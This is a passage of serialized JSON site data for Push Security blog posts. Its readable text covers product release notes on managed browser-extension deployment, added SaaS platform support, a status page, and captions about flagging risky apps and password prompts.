65,"nodeType":173},{},[],{"data":324562,"content":324565,"nodeType":312},{"target":324563},{"sys":324564},{"id":323470,"type":317,"linkType":318},[],{"data":324567,"content":324568,"nodeType":169},{},[324569],{"data":324570,"marks":324571,"value":323478,"nodeType":173},{},[],{"data":324573,"content":324574,"nodeType":178},{},[324575],{"data":324576,"marks":324577,"value":323485,"nodeType":173},{},[],{"data":324579,"content":324580,"nodeType":178},{},[324581],{"data":324582,"marks":324583,"value":323492,"nodeType":173},{},[],{"data":324585,"content":324586,"nodeType":178},{},[324587],{"data":324588,"marks":324589,"value":323499,"nodeType":173},{},[],{"data":324591,"content":324592,"nodeType":169},{},[324593,324596,324600],{"data":324594,"marks":324595,"value":323506,"nodeType":173},{},[],{"data":324597,"marks":324598,"value":323511,"nodeType":173},{},[324599],{"type":1646},{"data":324601,"marks":324602,"value":323515,"nodeType":173},{},[],{"data":324604,"content":324605,"nodeType":178},{},[324606,324609,324613],{"data":324607,"marks":324608,"value":323522,"nodeType":173},{},[],{"data":324610,"marks":324611,"value":323527,"nodeType":173},{},[324612],{"type":1646},{"data":324614,"marks":324615,"value":323531,"nodeType":173},{},[],{"data":324617,"content":324618,"nodeType":178},{},[324619,324622,324629,324632,324639],{"data":324620,"marks":324621,"value":323538,"nodeType":173},{},[],{"data":324623,"content":324624,"nodeType":186},{"uri":117883},[324625],{"data":324626,"marks":324627,"value":323546,"nodeType":173},{},[324628],{"type":194},{"data":324630,"marks":324631,"value":933,"nodeType":173},{},[],{"data":324633,"content":324634,"nodeType":186},{"uri":323552},[324635],{"data":324636,"marks":324637,"value":117876,"nodeType":173},{},[324638],{"type":194},{"data":324640,"marks":324641,"value":323561,"nodeType":173},{},[],{"entries":324643},{"inline":324644,"hyperlink":324645,"block":324648},[],[324646],{"sys":324647,"__typename":1528,"title":323816,"slug":323819},{"id":323060},[324649,324652,324655,324662,324670,324676,324682],{"sys":324650,"__typename":5345,"title":315586,"caption":315587,"layoutMode":118,"file":324651},{"id":280474},{"url":315589,"width":310485,"height":315590},{"sys":324653,"__typename":5345,"title":310481,"caption":310482,"layoutMode":118,"file":324654},{"id":280624},{"url":310484,"width":310485,"height":310486},{"sys":324656,"__typename":5345,"title":324657,"caption":324658,"layoutMode":118,"file":324659},{"id":323306},"Channel message high risk","Channel messaging flags new apps that request excessive access and permissions",{"url":324660,"width":324661,"height":173217},"https://images.ctfassets.net/y1cdw1ablpvd/16GOmyxENsdDIXYSEuXLvs/fa2cae84b345ca3bed2b11c55250516a/image5.png",1410,{"sys":324663,"__typename":5345,"title":324664,"caption":324665,"layoutMode":112585,"file":324666},{"id":323347},"User centric pyramid","This combination of user-centric features drives a shared-responsibility model for securing SaaS at scale",{"url":324667,"width":324668,"height":324669},"https://images.ctfassets.net/y1cdw1ablpvd/4tVqPb2j9CakuDQJOdrV05/8982dc92b9a91281fcfc84437f949798/image2.png",769,543,{"sys":324671,"__typename":5345,"title":324672,"caption":324673,"layoutMode":118,"file":324674},{"id":323416},"Just-in-time password security notifications","Just-in-time password security notifications help prevent weak passwords at the initial sign-up point",{"url":324675,"width":80142,"height":273012},"https://images.ctfassets.net/y1cdw1ablpvd/7inJ8mDRdC8m3uLPPrzke1/8886ca4dd9a7ab57d30a5defd33ed8de/image7.png",{"sys":324677,"__typename":5345,"title":324678,"caption":324679,"layoutMode":118,"file":324680},{"id":323443},"Inactive app ChatOps message ","A ChatOps message to an employee about an unused app that could be removed to reduce the SaaS attack surface",{"url":324681,"width":324661,"height":182453},"https://images.ctfassets.net/y1cdw1ablpvd/6l8kHejUI8T4KYkuHgKdYJ/4ad0373d188047edef245e2b1c1e00d1/image8.png",{"sys":324683,"__typename":5345,"title":323451,"caption":324684,"layoutMode":118,"file":324685},{"id":323470},"Employee SaaS security overview in the Push platform",{"url":324686,"width":273005,"height":324687},"https://images.ctfassets.net/y1cdw1ablpvd/5N2IRTdh1hmG6a9D6b5fGM/4afae228bd32772e8497f00d47a6b049/image1.png",944,"content:blog:from-launch-to-series-a.json","blog/from-launch-to-series-a.json","blog/from-launch-to-series-a",{"_path":324692,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":324693,"ogImage":118,"summary":324695,"title":301648,"subtitle":118,"metaTitle":324706,"synopsis":301649,"hashTags":118,"publishedDate":301650,"slug":301651,"tagsCollection":324707,"relatedBlogPostsCollection":324711,"authorsCollection":325451,"content":325455,"_id":325906,"_type":5439,"_source":5440,"_file":325907,"_stem":325908,"_extension":5439},"/blog/product-release-march-2023",{"id":301144,"publishedAt":324694},"2024-01-04T15:33:52.108Z",{"json":324696},{"data":324697,"content":324698,"nodeType":165},{},[324699],{"data":324700,"content":324701,"nodeType":178},{},[324702],{"data":324703,"marks":324704,"value":324705,"nodeType":173},{},[],"Provide just-in-time password guidance with inline browser prompts, identify dormant third-party integrations, and more.","Push Security new product features for March 2023 ",{"items":324708},[324709],{"sys":324710,"name":18399},{"id":18398},{"items":324712},[324713,325079],{"__typename":1528,"sys":324714,"content":324715,"title":319742,"synopsis":319743,"hashTags":118,"publishedDate":319744,"slug":319745,"tagsCollection":325071,"authorsCollection":325075},{"id":319324},{"json":324716},{"data":324717,"content":324718,"nodeType":165},{},[324719,324725,324767,324773,324786,324821,324841,324864,324879,324884,324890,324910,324915,324921,324972,324987,324993,324999,325012,325017,325023,325036,325041,325056],{"data":324720,"content":324721,"nodeType":235},{},[324722],{"data":324723,"marks":324724,"value":319335,"nodeType":173},{},[],{"data":324726,"content":324727,"nodeType":250},{},[324728,324741,324754],{"data":324729,"content":324730,"nodeType":254},{},[324731],{"data":324732,"content":324733,"nodeType":178},{},[324734,324738],{"data":324735,"marks":324736,"value":156526,"nodeType":173},{},[324737],{"type":370},{"data":324739,"marks":324740,"value":319352,"nodeType":173},{},[],{"data":324742,"content":324743,"nodeType":254},{},[324744],{"data":324745,"content":324746,"nodeType":178},{},[324747,324751],{"data":324748,"marks":324749,"value":319363,"nodeType":173},{},[324750],{"type":370},{"data":324752,"marks":324753,"value":319367,"nodeType":173},{},[],{"data":324755,"content":324756,"nodeType":254},{},[324757],{"data":324758,"content":324759,"nodeType":178},{},[324760,324764],{"data":324761,"marks":324762,"value":319378,"nodeType":173},{},[324763],{"type":370},{"data":324765,"marks":324766,"value":319382,"nodeType":173},{},[],{"data":324768,"content":324769,"nodeType":235},{},[324770],{"data":324771,"marks":324772,"value":319389,"nodeType":173},{},[],{"data":324774,"content":324775,"nodeType":178},{},[324776,324779,324783],{"data":324777,"marks":324778,"value":319396,"nodeType":173},{},[],{"data":324780,"marks":324781,"value":319401,"nodeType":173},{},[324782],{"type":370},{"data":324784,"marks":324785,"value":319405,"nodeType":173},{},[],{"data":324787,"content":324788,"nodeType":250},{},[324789,324805],{"data":324790,"content":324791,"nodeType":254},{},[324792],{"data":324793,"content":324794,"nodeType":178},{},[324795,324798,324802],{"data":324796,"marks":324797,"value":319418,"nodeType":173},{},[],{"data":324799,"marks":324800,"value":319423,"nodeType":173},{},[324801],{"type":370},{"data":324803,"marks":324804,"value":319427,"nodeType":173},{},[],{"data":324806,"content":324807,"nodeType":254},{},[324808],{"data":324809,"content":324810,"nodeType":178},{},[324811,324814,324818],{"data":324812,"marks":324813,"value":319437,"nodeType":173},{},[],{"data":324815,"marks":324816,"value":319442,"nodeType":173},{},[324817],{"type":370},{"data":324819,"marks":324820,"value":1477,"nodeType":173},{},[],{"data":324822,"content":324823,"nodeType":178},{},[324824,324827,324831,324834,324838],{"data":324825,"marks":324826,"value":319452,"nodeType":173},{},[],{"data":324828,"marks":324829,"value":319457,"nodeType":173},{},[324830],{"type":370},{"data":324832,"marks":324833,"value":1464,"nodeType":173},{},[],{"data":324835,"marks":324836,"value":319465,"nodeType":173},{},[324837],{"type":370},{"data":324839,"marks":324840,"value":319469,"nodeType":173},{},[],{"data":324842,"content":324843,"nodeType":178},{},[324844,324847,324854,324857,324861],{"data":324845,"marks":324846,"value":319476,"nodeType":173},{},[],{"data":324848,"content":324849,"nodeType":186},{"uri":319479},[324850],{"data":324851,"marks":324852,"value":156537,"nodeType":173},{},[324853],{"type":370},{"data":324855,"marks":324856,"value":319488,"nodeType":173},{},[],{"data":324858,"marks":324859,"value":319493,"nodeType":173},{},[324860],{"type":370},{"data":324862,"marks":324863,"value":319497,"nodeType":173},{},[],{"data":324865,"content":324866,"nodeType":178},{},[324867,324870,324876],{"data":324868,"marks":324869,"value":319504,"nodeType":173},{},[],{"data":324871,"content":324872,"nodeType":186},{"uri":301319},[324873],{"data":324874,"marks":324875,"value":301322,"nodeType":173},{},[],{"data":324877,"marks":324878,"value":1477,"nodeType":173},{},[],{"data":324880,"content":324883,"nodeType":312},{"target":324881},{"sys":324882},{"id":319518,"type":317,"linkType":318},[],{"data":324885,"content":324886,"nodeType":235},{},[324887],{"data":324888,"marks":324889,"value":319526,"nodeType":173},{},[],{"data":324891,"content":324892,"nodeType":178},{},[324893,324896,324900,324907],{"data":324894,"marks":324895,"value":319533,"nodeType":173},{},[],{"data":324897,"marks":324898,"value":319538,"nodeType":173},{},[324899],{"type":370},{"data":324901,"content":324902,"nodeType":186},{"uri":319479},[324903],{"data":324904,"marks":324905,"value":319546,"nodeType":173},{},[324906],{"type":370},{"data":324908,"marks":324909,"value":1477,"nodeType":173},{},[],{"data":324911,"content":324914,"nodeType":312},{"target":324912},{"sys":324913},{"id":319554,"type":317,"linkType":318},[],{"data":324916,"content":324917,"nodeType":178},{},[324918],{"data":324919,"marks":324920,"value":319562,"nodeType":173},{},[],{"data":324922,"content":324923,"nodeType":250},{},[324924,324940,324956],{"data":324925,"content":324926,"nodeType":254},{},[324927],{"data":324928,"content":324929,"nodeType":178},{},[324930,324933,324937],{"data":324931,"marks":324932,"value":319575,"nodeType":173},{},[],{"data":324934,"marks":324935,"value":319580,"nodeType":173},{},[324936],{"type":370},{"data":324938,"marks":324939,"value":319584,"nodeType":173},{},[],{"data":324941,"content":324942,"nodeType":254},{},[324943],{"data":324944,"content":324945,"nodeType":178},{},[324946,324949,324953],{"data":324947,"marks":324948,"value":319594,"nodeType":173},{},[],{"data":324950,"marks":324951,"value":319599,"nodeType":173},{},[324952],{"type":370},{"data":324954,"marks":324955,"value":319603,"nodeType":173},{},[],{"data":324957,"content":324958,"nodeType":254},{},[324959],{"data":324960,"content":324961,"nodeType":178},{},[324962,324965,324969],{"data":324963,"marks":324964,"value":319613,"nodeType":173},{},[],{"data":324966,"marks":324967,"value":319618,"nodeType":173},{},[324968],{"type":370},{"data":324970,"marks":324971,"value":319622,"nodeType":173},{},[],{"data":324973,"content":324974,"nodeType":178},{},[324975,324978,324984],{"data":324976,"marks":324977,"value":319629,"nodeType":173},{},[],{"data":324979,"content":324980,"nodeType":186},{"uri":319632},[324981],{"data":324982,"marks":324983,"value":319637,"nodeType":173},{},[],{"data":324985,"marks":324986,"value":319641,"nodeType":173},{},[],{"data":324988,"content":324989,"nodeType":178},{},[324990],{"data":324991,"marks":324992,"value":319648,"nodeType":173},{},[],{"data":324994,"content":324995,"nodeType":235},{},[324996],{"data":324997,"marks":324998,"value":319655,"nodeType":173},{},[],{"data":325000,"content":325001,"nodeType":178},{},[325002,325005,325009],{"data":325003,"marks":325004,"value":319662,"nodeType":173},{},[],{"data":325006,"marks":325007,"value":319667,"nodeType":173},{},[325008],{"type":370},{"data":325010,"marks":325011,"value":319671,"nodeType":173},{},[],{"data":325013,"content":325016,"nodeType":312},{"target":325014},{"sys":325015},{"id":319676,"type":317,"linkType":318},[],{"data":325018,"content":325019,"nodeType":178},{},[325020],{"data":325021,"marks":325022,"value":319684,"nodeType":173},{},[],{"data":325024,"content":325025,"nodeType":178},{},[325026,325029,325033],{"data":325027,"marks":325028,"value":319691,"nodeType":173},{},[],{"data":325030,"marks":325031,"value":319696,"nodeType":173},{},[325032],{"type":370},{"data":325034,"marks":325035,"value":319700,"nodeType":173},{},[],{"data":325037,"content":325040,"nodeType":312},{"target":325038},{"sys":325039},{"id":319705,"type":317,"linkType":318},[],{"data":325042,"content":325043,"nodeType":178},{},[325044,325047,325053],{"data":325045,"marks":325046,"value":319713,"nodeType":173},{},[],{"data":325048,"content":325049,"nodeType":186},{"uri":319716},[325050],{"data":325051,"marks":325052,"value":21642,"nodeType":173},{},[],{"data":325054,"marks":325055,"value":1477,"nodeType":173},{},[],{"data":325057,"content":325058,"nodeType":178},{},[325059,325062,325068],{"data":325060,"marks":325061,"value":319730,"nodeType":173},{},[],{"data":325063,"content":325064,"nodeType":186},{"uri":301319},[325065],{"data":325066,"marks":325067,"value":319737,"nodeType":173},{},[],{"data":325069,"marks":325070,"value":319741,"nodeType":173},{},[],{"items":325072},[325073],{"sys":325074,"name":18399},{"id":18398},{"items":325076},[325077],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":325078},{"url":19129},{"__typename":1528,"sys":325080,"content":325082,"title":325439,"synopsis":325440,"hashTags":118,"publishedDate":325441,"slug":325442,"tagsCollection":325443,"authorsCollection":325447},{"id":325081},"1ytdqzP7J1fAkeoTMixUam",{"json":325083},{"data":325084,"content":325085,"nodeType":165},{},[325086,325092,325115,325122,325143,325167,325174,325219,325237,325243,325250,325257,325276,325293,325310,325327,325344,325362,325369,325376,325396,325402,325421],{"data":325087,"content":325088,"nodeType":169},{},[325089],{"data":325090,"marks":325091,"value":319335,"nodeType":173},{},[],{"data":325093,"content":325094,"nodeType":250},{},[325095,325105],{"data":325096,"content":325097,"nodeType":254},{},[325098],{"data":325099,"content":325100,"nodeType":178},{},[325101],{"data":325102,"marks":325103,"value":325104,"nodeType":173},{},[],"Deploy the Push browser extension to your managed machines and browsers without needing interaction from users.",{"data":325106,"content":325107,"nodeType":254},{},[325108],{"data":325109,"content":325110,"nodeType":178},{},[325111],{"data":325112,"marks":325113,"value":325114,"nodeType":173},{},[],"Support added for 78 new SaaS platforms bringing the number of SaaS platforms supported by Push to over 350!",{"data":325116,"content":325117,"nodeType":235},{},[325118],{"data":325119,"marks":325120,"value":325121,"nodeType":173},{},[],"Managed browser extension deployments",{"data":325123,"content":325124,"nodeType":178},{},[325125,325129,325134,325138],{"data":325126,"marks":325127,"value":325128,"nodeType":173},{},[],"Our most requested feature is here! You can now ",{"data":325130,"marks":325131,"value":325133,"nodeType":173},{},[325132],{"type":370},"deploy the Push browser extension ",{"data":325135,"marks":325136,"value":325137,"nodeType":173},{},[],"using GPO, device management software, or managed Chrome browsers",{"data":325139,"marks":325140,"value":325142,"nodeType":173},{},[325141],{"type":370}," with zero interaction from users.",{"data":325144,"content":325145,"nodeType":178},{},[325146,325150,325155,325158,325163],{"data":325147,"marks":325148,"value":325149,"nodeType":173},{},[],"Obviously this new feature makes things easier for you, but it also has a massive impact on how quickly you can deploy Push. You can be up and running with Push, with ",{"data":325151,"marks":325152,"value":325154,"nodeType":173},{},[325153],{"type":1646},"all of your employees onboarded",{"data":325156,"marks":325157,"value":2936,"nodeType":173},{},[],{"data":325159,"marks":325160,"value":325162,"nodeType":173},{},[325161],{"type":370},"in minutes",{"data":325164,"marks":325165,"value":325166,"nodeType":173},{},[],". One centralized deployment of the browser extension and one API integration is all it takes to be fully deployed.",{"data":325168,"content":325169,"nodeType":178},{},[325170],{"data":325171,"marks":325172,"value":325173,"nodeType":173},{},[],"Using the managed rollout feature works like this:",{"data":325175,"content":325176,"nodeType":246189},{},[325177,325199,325209],{"data":325178,"content":325179,"nodeType":254},{},[325180],{"data":325181,"content":325182,"nodeType":178},{},[325183,325187,325196],{"data":325184,"marks":325185,"value":325186,"nodeType":173},{},[],"Go to the new ",{"data":325188,"content":325190,"nodeType":186},{"uri":325189},"https://pushsecurity.com/app/browsers/",[325191],{"data":325192,"marks":325193,"value":325195,"nodeType":173},{},[325194],{"type":194},"browsers page",{"data":325197,"marks":325198,"value":247472,"nodeType":173},{},[],{"data":325200,"content":325201,"nodeType":254},{},[325202],{"data":325203,"content":325204,"nodeType":178},{},[325205],{"data":325206,"marks":325207,"value":325208,"nodeType":173},{},[],"Select your enrollment method, and ",{"data":325210,"content":325211,"nodeType":254},{},[325212],{"data":325213,"content":325214,"nodeType":178},{},[325215],{"data":325216,"marks":325217,"value":325218,"nodeType":173},{},[],"Download the config for your team. ",{"data":325220,"content":325221,"nodeType":178},{},[325222,325226,325233],{"data":325223,"marks":325224,"value":325225,"nodeType":173},{},[],"Track the deployment using the new ",{"data":325227,"content":325228,"nodeType":186},{"uri":325189},[325229],{"data":325230,"marks":325231,"value":325195,"nodeType":173},{},[325232],{"type":194},{"data":325234,"marks":325235,"value":325236,"nodeType":173},{},[],", which shows you details of your coverage so you can see which users, browser types and operating systems are covered.",{"data":325238,"content":325242,"nodeType":312},{"target":325239},{"sys":325240},{"id":325241,"type":317,"linkType":318},"3W8zDmsMzKgZCYCCMTlnvq",[],{"data":325244,"content":325245,"nodeType":178},{},[325246],{"data":325247,"marks":325248,"value":325249,"nodeType":173},{},[],"We have guides for each enrollment method, so you’ll be set up in no time. ",{"data":325251,"content":325252,"nodeType":178},{},[325253],{"data":325254,"marks":325255,"value":325256,"nodeType":173},{},[],"How to deploy the Push browser extension in:",{"data":325258,"content":325259,"nodeType":178},{},[325260,325263,325273],{"data":325261,"marks":325262,"value":37,"nodeType":173},{},[],{"data":325264,"content":325268,"nodeType":1698},{"target":325265},{"sys":325266},{"id":325267,"type":317,"linkType":318},"gIlDaovHybZ4L8kssAsje",[325269],{"data":325270,"marks":325271,"value":325272,"nodeType":173},{},[],"Google Chrome using the Google Admin Console",{"data":325274,"marks":325275,"value":37,"nodeType":173},{},[],{"data":325277,"content":325278,"nodeType":178},{},[325279,325282,325290],{"data":325280,"marks":325281,"value":37,"nodeType":173},{},[],{"data":325283,"content":325285,"nodeType":186},{"uri":325284},"https://pushsecurity.com/help/audience/administrators/docs/install-the-browser-extension/managed-deployment-using-microsoft-group-policy#deploying-to-google-chrome",[325286],{"data":325287,"marks":325288,"value":325289,"nodeType":173},{},[],"Google Chrome using Group Policy",{"data":325291,"marks":325292,"value":37,"nodeType":173},{},[],{"data":325294,"content":325295,"nodeType":178},{},[325296,325299,325307],{"data":325297,"marks":325298,"value":37,"nodeType":173},{},[],{"data":325300,"content":325302,"nodeType":186},{"uri":325301},"https://pushsecurity.com/help/audience/administrators/docs/install-the-browser-extension/managed-deployment-using-microsoft-group-policy#deploying-to-microsoft-edge",[325303],{"data":325304,"marks":325305,"value":325306,"nodeType":173},{},[],"Microsoft Edge using Group Policy",{"data":325308,"marks":325309,"value":37,"nodeType":173},{},[],{"data":325311,"content":325312,"nodeType":178},{},[325313,325316,325324],{"data":325314,"marks":325315,"value":37,"nodeType":173},{},[],{"data":325317,"content":325319,"nodeType":186},{"uri":325318},"https://pushsecurity.com/help/audience/administrators/docs/install-the-browser-extension/managed-deployment-using-microsoft-endpoint-manager-intune#deploying-to-google-chrome",[325320],{"data":325321,"marks":325322,"value":325323,"nodeType":173},{},[],"Google Chrome using Microsoft Endpoint Manager (InTune)",{"data":325325,"marks":325326,"value":37,"nodeType":173},{},[],{"data":325328,"content":325329,"nodeType":178},{},[325330,325333,325341],{"data":325331,"marks":325332,"value":37,"nodeType":173},{},[],{"data":325334,"content":325336,"nodeType":186},{"uri":325335},"https://pushsecurity.com/help/audience/administrators/docs/install-the-browser-extension/managed-deployment-using-microsoft-endpoint-manager-intune#deploying-to-microsoft-edge",[325337],{"data":325338,"marks":325339,"value":325340,"nodeType":173},{},[],"Microsoft Edge using Microsoft Endpoint Manager (InTune)",{"data":325342,"marks":325343,"value":37,"nodeType":173},{},[],{"data":325345,"content":325346,"nodeType":178},{},[325347,325350,325359],{"data":325348,"marks":325349,"value":37,"nodeType":173},{},[],{"data":325351,"content":325354,"nodeType":1698},{"target":325352},{"sys":325353},{"id":189034,"type":317,"linkType":318},[325355],{"data":325356,"marks":325357,"value":325358,"nodeType":173},{},[],"Google Chrome or Microsoft Edge on MacOS using an MDM",{"data":325360,"marks":325361,"value":37,"nodeType":173},{},[],{"data":325363,"content":325364,"nodeType":235},{},[325365],{"data":325366,"marks":325367,"value":325368,"nodeType":173},{},[],"New SaaS platform support",{"data":325370,"content":325371,"nodeType":178},{},[325372],{"data":325373,"marks":325374,"value":325375,"nodeType":173},{},[],"In the past month we’ve added support for 78 new SaaS platforms. You can now help your users securely use over 350 SaaS platforms using the Push browser extension.",{"data":325377,"content":325378,"nodeType":178},{},[325379,325383,325392],{"data":325380,"marks":325381,"value":325382,"nodeType":173},{},[],"We’ll be continuing to add to our SaaS coverage as we onboard more users who are logging into more apps. You can see our ",{"data":325384,"content":325386,"nodeType":186},{"uri":325385},"https://pushsecurity.com/integration/supported",[325387],{"data":325388,"marks":325389,"value":325391,"nodeType":173},{},[325390],{"type":194},"full list",{"data":325393,"marks":325394,"value":325395,"nodeType":173},{},[],", which we’ll continue updating in real time.",{"data":325397,"content":325401,"nodeType":312},{"target":325398},{"sys":325399},{"id":325400,"type":317,"linkType":318},"tXa0gu4NhqGaBS30eeSZB",[],{"data":325403,"content":325404,"nodeType":178},{},[325405,325409,325417],{"data":325406,"marks":325407,"value":325408,"nodeType":173},{},[],"One more quick update: we now have a ",{"data":325410,"content":325411,"nodeType":186},{"uri":301630},[325412],{"data":325413,"marks":325414,"value":325416,"nodeType":173},{},[325415],{"type":194},"status page",{"data":325418,"marks":325419,"value":325420,"nodeType":173},{},[],", which provides real-time and historical data on system performance. ",{"data":325422,"content":325423,"nodeType":178},{},[325424,325428,325435],{"data":325425,"marks":325426,"value":325427,"nodeType":173},{},[],"That’s it for now, but there’s plenty more in the hopper. Send us your requests at ",{"data":325429,"content":325430,"nodeType":186},{"uri":301319},[325431],{"data":325432,"marks":325433,"value":301322,"nodeType":173},{},[325434],{"type":194},{"data":325436,"marks":325437,"value":325438,"nodeType":173},{},[]," and we’ll see if your idea aligns with our roadmap. And, as always, feel free to reach out with any questions or if you need help overcoming any hiccups.","Product release: August 2022","Here’s what’s new on the Push platform for August 2022.","2022-08-25T00:00:00.000Z","product-release-august-2022",{"items":325444},[325445],{"sys":325446,"name":18399},{"id":18398},{"items":325448},[325449],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":325450},{"url":19129},{"items":325452},[325453],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":325454},{"url":19129},{"json":325456,"links":325878},{"nodeType":165,"data":325457,"content":325458},{},[325459,325465,325513,325528,325534,325563,325570,325592,325597,325612,325618,325631,325658,325663,325676,325682,325688,325710,325726,325742,325748,325779,325801,325806,325812,325832,325845,325850,325856],{"nodeType":235,"data":325460,"content":325461},{},[325462],{"nodeType":173,"value":220348,"marks":325463,"data":325464},[],{},{"nodeType":250,"data":325466,"content":325467},{},[325468,325477,325486,325495,325504],{"nodeType":254,"data":325469,"content":325470},{},[325471],{"nodeType":178,"data":325472,"content":325473},{},[325474],{"nodeType":173,"value":301165,"marks":325475,"data":325476},[],{},{"nodeType":254,"data":325478,"content":325479},{},[325480],{"nodeType":178,"data":325481,"content":325482},{},[325483],{"nodeType":173,"value":301175,"marks":325484,"data":325485},[],{},{"nodeType":254,"data":325487,"content":325488},{},[325489],{"nodeType":178,"data":325490,"content":325491},{},[325492],{"nodeType":173,"value":301185,"marks":325493,"data":325494},[],{},{"nodeType":254,"data":325496,"content":325497},{},[325498],{"nodeType":178,"data":325499,"content":325500},{},[325501],{"nodeType":173,"value":301195,"marks":325502,"data":325503},[],{},{"nodeType":254,"data":325505,"content":325506},{},[325507],{"nodeType":178,"data":325508,"content":325509},{},[325510],{"nodeType":173,"value":301205,"marks":325511,"data":325512},[],{},{"nodeType":178,"data":325514,"content":325515},{},[325516,325519,325525],{"nodeType":173,"value":301212,"marks":325517,"data":325518},[],{},{"nodeType":186,"data":325520,"content":325521},{"uri":301217},[325522],{"nodeType":173,"value":301220,"marks":325523,"data":325524},[],{},{"nodeType":173,"value":301224,"marks":325526,"data":325527},[],{},{"nodeType":235,"data":325529,"content":325530},{},[325531],{"nodeType":173,"value":301231,"marks":325532,"data":325533},[],{},{"nodeType":178,"data":325535,"content":325536},{},[325537,325540,325546,325549,325553,325556,325560],{"nodeType":173,"value":37,"marks":325538,"data":325539},[],{},{"nodeType":186,"data":325541,"content":325542},{"uri":301242},[325543],{"nodeType":173,"value":285457,"marks":325544,"data":325545},[],{},{"nodeType":173,"value":301248,"marks":325547,"data":325548},[],{},{"nodeType":173,"value":301252,"marks":325550,"data":325552},[325551],{"type":370},{},{"nodeType":173,"value":301257,"marks":325554,"data":325555},[],{},{"nodeType":173,"value":248675,"marks":325557,"data":325559},[325558],{"type":370},{},{"nodeType":173,"value":301265,"marks":325561,"data":325562},[],{},{"nodeType":178,"data":325564,"content":325565},{},[325566],{"nodeType":173,"value":301272,"marks":325567,"data":325569},[325568],{"type":370},{},{"nodeType":178,"data":325571,"content":325572},{},[325573,325576,325582,325585,325589],{"nodeType":173,"value":301280,"marks":325574,"data":325575},[],{},{"nodeType":186,"data":325577,"content":325578},{"uri":301285},[325579],{"nodeType":173,"value":301288,"marks":325580,"data":325581},[],{},{"nodeType":173,"value":301292,"marks":325583,"data":325584},[],{},{"nodeType":173,"value":301296,"marks":325586,"data":325588},[325587],{"type":370},{},{"nodeType":173,"value":301301,"marks":325590,"data":325591},[],{},{"nodeType":312,"data":325593,"content":325596},{"target":325594},{"sys":325595},{"id":301308,"type":317,"linkType":318},[],{"nodeType":178,"data":325598,"content":325599},{},[325600,325603,325609],{"nodeType":173,"value":301314,"marks":325601,"data":325602},[],{},{"nodeType":186,"data":325604,"content":325605},{"uri":301319},[325606],{"nodeType":173,"value":301322,"marks":325607,"data":325608},[],{},{"nodeType":173,"value":2340,"marks":325610,"data":325611},[],{},{"nodeType":235,"data":325613,"content":325614},{},[325615],{"nodeType":173,"value":301175,"marks":325616,"data":325617},[],{},{"nodeType":178,"data":325619,"content":325620},{},[325621,325624,325628],{"nodeType":173,"value":301338,"marks":325622,"data":325623},[],{},{"nodeType":173,"value":301342,"marks":325625,"data":325627},[325626],{"type":370},{},{"nodeType":173,"value":301347,"marks":325629,"data":325630},[],{},{"nodeType":178,"data":325632,"content":325633},{},[325634,325637,325641,325644,325648,325651,325655],{"nodeType":173,"value":301354,"marks":325635,"data":325636},[],{},{"nodeType":173,"value":301358,"marks":325638,"data":325640},[325639],{"type":370},{},{"nodeType":173,"value":301363,"marks":325642,"data":325643},[],{},{"nodeType":173,"value":301367,"marks":325645,"data":325647},[325646],{"type":370},{},{"nodeType":173,"value":301372,"marks":325649,"data":325650},[],{},{"nodeType":173,"value":301376,"marks":325652,"data":325654},[325653],{"type":370},{},{"nodeType":173,"value":301381,"marks":325656,"data":325657},[],{},{"nodeType":312,"data":325659,"content":325662},{"target":325660},{"sys":325661},{"id":301388,"type":317,"linkType":318},[],{"nodeType":178,"data":325664,"content":325665},{},[325666,325669,325673],{"nodeType":173,"value":301394,"marks":325667,"data":325668},[],{},{"nodeType":173,"value":301398,"marks":325670,"data":325672},[325671],{"type":370},{},{"nodeType":173,"value":301403,"marks":325674,"data":325675},[],{},{"nodeType":178,"data":325677,"content":325678},{},[325679],{"nodeType":173,"value":301410,"marks":325680,"data":325681},[],{},{"nodeType":235,"data":325683,"content":325684},{},[325685],{"nodeType":173,"value":301417,"marks":325686,"data":325687},[],{},{"nodeType":178,"data":325689,"content":325690},{},[325691,325694,325700,325703,325707],{"nodeType":173,"value":301424,"marks":325692,"data":325693},[],{},{"nodeType":186,"data":325695,"content":325696},{"uri":301429},[325697],{"nodeType":173,"value":301432,"marks":325698,"data":325699},[],{},{"nodeType":173,"value":301436,"marks":325701,"data":325702},[],{},{"nodeType":173,"value":301440,"marks":325704,"data":325706},[325705],{"type":370},{},{"nodeType":173,"value":301445,"marks":325708,"data":325709},[],{},{"nodeType":178,"data":325711,"content":325712},{},[325713,325716,325723],{"nodeType":173,"value":301452,"marks":325714,"data":325715},[],{},{"nodeType":186,"data":325717,"content":325718},{"uri":301457},[325719],{"nodeType":173,"value":301460,"marks":325720,"data":325722},[325721],{"type":370},{},{"nodeType":173,"value":148819,"marks":325724,"data":325725},[],{},{"nodeType":178,"data":325727,"content":325728},{},[325729,325732,325739],{"nodeType":173,"value":301471,"marks":325730,"data":325731},[],{},{"nodeType":186,"data":325733,"content":325734},{"uri":301476},[325735],{"nodeType":173,"value":301479,"marks":325736,"data":325738},[325737],{"type":370},{},{"nodeType":173,"value":301484,"marks":325740,"data":325741},[],{},{"nodeType":235,"data":325743,"content":325744},{},[325745],{"nodeType":173,"value":301491,"marks":325746,"data":325747},[],{},{"nodeType":178,"data":325749,"content":325750},{},[325751,325754,325760,325763,325767,325770,325776],{"nodeType":173,"value":301498,"marks":325752,"data":325753},[],{},{"nodeType":186,"data":325755,"content":325756},{"uri":301503},[325757],{"nodeType":173,"value":301506,"marks":325758,"data":325759},[],{},{"nodeType":173,"value":301510,"marks":325761,"data":325762},[],{},{"nodeType":173,"value":301514,"marks":325764,"data":325766},[325765],{"type":370},{},{"nodeType":173,"value":301519,"marks":325768,"data":325769},[],{},{"nodeType":186,"data":325771,"content":325772},{"uri":111940},[325773],{"nodeType":173,"value":21642,"marks":325774,"data":325775},[],{},{"nodeType":173,"value":2340,"marks":325777,"data":325778},[],{},{"nodeType":178,"data":325780,"content":325781},{},[325782,325785,325789,325792,325798],{"nodeType":173,"value":301535,"marks":325783,"data":325784},[],{},{"nodeType":173,"value":301539,"marks":325786,"data":325788},[325787],{"type":370},{},{"nodeType":173,"value":301544,"marks":325790,"data":325791},[],{},{"nodeType":186,"data":325793,"content":325794},{"uri":301549},[325795],{"nodeType":173,"value":21642,"marks":325796,"data":325797},[],{},{"nodeType":173,"value":1477,"marks":325799,"data":325800},[],{},{"nodeType":312,"data":325802,"content":325805},{"